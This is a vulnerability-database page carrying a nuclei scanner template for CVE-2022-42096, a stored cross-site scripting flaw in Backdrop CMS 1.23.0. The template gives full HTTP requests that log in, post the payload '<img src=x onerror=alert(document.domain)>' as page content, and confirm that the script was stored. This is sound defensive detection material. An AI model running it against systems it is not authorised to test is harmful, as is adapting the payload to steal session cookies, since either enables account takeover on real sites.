Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)

๐Ÿ—“๏ธย 03 Jun 2026ย 06:04:49Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei๐Ÿ”—ย github.com๐Ÿ‘ย 32ย Views

Backdrop CMS v1.23.0 XSS (Stored) vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2022-42096
22 Nov 202200:37
โ€“circl
CNNVD		Backdrop CMS ่ทจ็ซ™่„šๆœฌๆผๆดž
21 Nov 202200:00
โ€“cnnvd
CVE		CVE-2022-42096
21 Nov 202200:00
โ€“cve
Cvelist		CVE-2022-42096
21 Nov 202200:00
โ€“cvelist
EUVD		EUVD-2022-7343
21 Nov 202221:30
โ€“euvd
Github Security Blog		Cross-site Scripting in Backdrop CMS
21 Nov 202221:30
โ€“github
NVD		CVE-2022-42096
21 Nov 202221:15
โ€“nvd
OSV		CVE-2022-42096
21 Nov 202221:15
โ€“osv
OSV		GHSA-G8JW-8VPV-PV5Q Cross-site Scripting in Backdrop CMS
21 Nov 202221:30
โ€“osv
Prion		Cross site scripting
21 Nov 202221:15
โ€“prion
Rows per page
id: CVE-2022-42096

info:
  name: Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)
  author: theamanrawat
  severity: medium
  description: |
    Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
  impact: |
    Authenticated attackers with content creation privileges can inject malicious JavaScript through post content to steal administrator session cookies and credentials when the malicious content is viewed.
  remediation: |
    Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/backdrop/backdrop/releases/tag/1.23.0
    - https://github.com/bypazs/CVE-2022-42096
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42096
    - https://backdropcms.org
    - https://github.com/manas3c/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2022-42096
    cwe-id: CWE-79
    epss-score: 0.0678
    epss-percentile: 0.91464
    cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: backdropcms
    product: backdrop_cms
  tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms,vuln

http:
  - raw:
      - |
        GET /?q=user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?q=user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
      - |
        GET /?q=node/add/post HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?q=node/add/post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp

        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="title"

        {{randstr}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="field_tags[und]"

        {{randstr}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="body[und][0][summary]"


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="body[und][0][value]"

        <img src=x onerror=alert(document.domain)>

        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="body[und][0][format]"

        full_html
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
        Content-Type: application/octet-stream


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="field_image[und][0][fid]"

        0
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="field_image[und][0][display]"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="changed"


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="form_build_id"

        {{form_id_1}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="form_token"

        {{form_token}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="form_id"

        {{form_id_2}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="status"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="scheduled[date]"

        2023-04-25
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="scheduled[time]"

        16:59:23
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="promote"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="name"

        {{name}}
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="date[date]"

        2023-04-24
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="date[time]"

        16:59:23
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="path[auto]"

        1
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="comment"

        2
        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="additional_settings__active_tab"


        ------WebKitFormBoundaryIubltUxssi0yqDjp
        Content-Disposition: form-data; name="op"

        Save
        ------WebKitFormBoundaryIubltUxssi0yqDjp--
      - |
        GET /?q=posts/{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <img src="x" onerror="alert(document.domain)" />
          - Backdrop CMS
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: form_id_1
        group: 1
        regex:
          - name="form_build_id" value="(.*)"
        internal: true

      - type: regex
        name: name
        group: 1
        regex:
          - name="name" value="(.*?)"
        internal: true

      - type: regex
        name: form_id_2
        group: 1
        regex:
          - name="form_id" value="(.*)"
        internal: true

      - type: regex
        name: form_token
        group: 1
        regex:
          - name="form_token" value="(.*)"
        internal: true
# digest: 4a0a00473045022100b4a5ebab65be2e28ea0d26913aa6956c2f438890eab098be279f51d14642d3a70220224679285f8103bce52b7433458ec1ed47c10b819218a506a7f1b4651910259a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.14.8
EPSS0.0678
SSVC
backdrop cmscve2022cross site scriptingmedium severityauthenticateduser input
32